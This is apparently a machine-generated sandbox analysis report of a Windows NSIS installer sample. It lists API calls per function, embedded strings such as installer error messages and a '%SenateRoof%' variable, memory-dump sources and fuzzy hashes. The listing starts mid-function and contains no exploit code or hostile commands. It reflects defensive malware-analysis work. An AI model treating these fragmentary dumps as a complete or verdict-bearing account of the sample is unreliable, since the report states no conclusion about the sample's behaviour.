                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                          • ShowWindow.USER32(00000008), ref: 00405333
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                          • CreatePopupMenu.USER32 ref: 00405376
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                                          • EmptyClipboard.USER32 ref: 00405411
                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                          • CloseClipboard.USER32 ref: 0040546E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                          • String ID: @rD$New install of "%s" to "%s"${
                                                          • API String ID: 2110491804-2409696222
                                                          • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                          • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                          Control-flow Graph (function 00403883-00403919 … 00403C59)
                                                          [graph edge list and Executed/Not Executed legend omitted; the APIs list below gives the calls this function makes]
                                                          APIs
                                                          • #17.COMCTL32 ref: 004038A2
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                          • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                          • API String ID: 2435955865-239407132
                                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                          Control-flow Graph

                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID:
                                                          • API String ID: 310444273-0
                                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                          Control-flow Graph

                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                          • ShowWindow.USER32(?), ref: 004054D2
                                                          • DestroyWindow.USER32 ref: 004054E6
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                          • EnableWindow.USER32(?,?), ref: 00405757
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: @rD
                                                          • API String ID: 3282139019-3814967855
                                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                          Control-flow Graph

                                                          APIs
                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                          • ShowWindow.USER32(?), ref: 00401753
                                                          • ShowWindow.USER32(?), ref: 00401767
                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                          Strings
                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                          • Call: %d, xrefs: 0040165A
                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                          • Aborting: "%s", xrefs: 0040161D
                                                          • Rename on reboot: %s, xrefs: 00401943
                                                          • Sleep(%d), xrefs: 0040169D
                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                          • detailprint: %s, xrefs: 00401679
                                                          • Rename failed: %s, xrefs: 0040194B
                                                          • BringToFront, xrefs: 004016BD
                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                          • Jump: %d, xrefs: 00401602
                                                          • Rename: %s, xrefs: 004018F8
                                                          Similarity
                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                          • API String ID: 2872004960-3619442763
                                                          • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                          • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                          • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 608394941-1650083594
                                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • lstrcatW.KERNEL32(00000000,00000000,%SenateRoof%,004CB0B0,00000000,00000000), ref: 00401A76
                                                          • CompareFileTime.KERNEL32(-00000014,?,%SenateRoof%,%SenateRoof%,00000000,00000000,%SenateRoof%,004CB0B0,00000000,00000000), ref: 00401AA0
                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                          Similarity
                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                          • String ID: %SenateRoof%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                          • API String ID: 4286501637-3060857477
                                                          • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                          • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                          Control-flow Graph
                                                          • Graph figure for the function at 403587 (basic blocks marked Executed / Not Executed)
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00403598
                                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                          Strings
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                          • Inst, xrefs: 0040366C
                                                          • soft, xrefs: 00403675
                                                          • Null, xrefs: 0040367E
                                                          • Error launching installer, xrefs: 004035D7
                                                          Similarity
                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 4283519449-527102705
                                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                          Control-flow Graph
                                                          • Graph figure for the function at 40337f (basic blocks marked Executed / Not Executed)
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004033E7
                                                          • GetTickCount.KERNEL32 ref: 00403464
                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                          • wsprintfW.USER32 ref: 004034A4
                                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                          Similarity
                                                          • API ID: CountFileTickWrite$wsprintf
                                                          • String ID: ... %d%%$P1B$X1C$X1C
                                                          • API String ID: 651206458-1535804072
                                                          • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                          • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                          Control-flow Graph
                                                          • Graph figure for the function at 404f72 (basic blocks marked Executed / Not Executed)
                                                          APIs
                                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                          • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2740478559-0
                                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                          Control-flow Graph
                                                          • Graph figure for the function at 401eb9 (basic blocks marked Executed / Not Executed)
                                                          APIs
                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                          • GlobalFree.KERNELBASE(0067E910), ref: 00402387
                                                          Similarity
                                                          • API ID: FreeGloballstrcpyn
                                                          • String ID: %SenateRoof%$Exch: stack < %d elements$Pop: stack empty
                                                          • API String ID: 1459762280-1304504562
                                                          • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                          • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                          Control-flow Graph
                                                          • Graph figure for the function at 4022fd (basic blocks marked Executed / Not Executed)
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                          • GlobalFree.KERNELBASE(0067E910), ref: 00402387
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
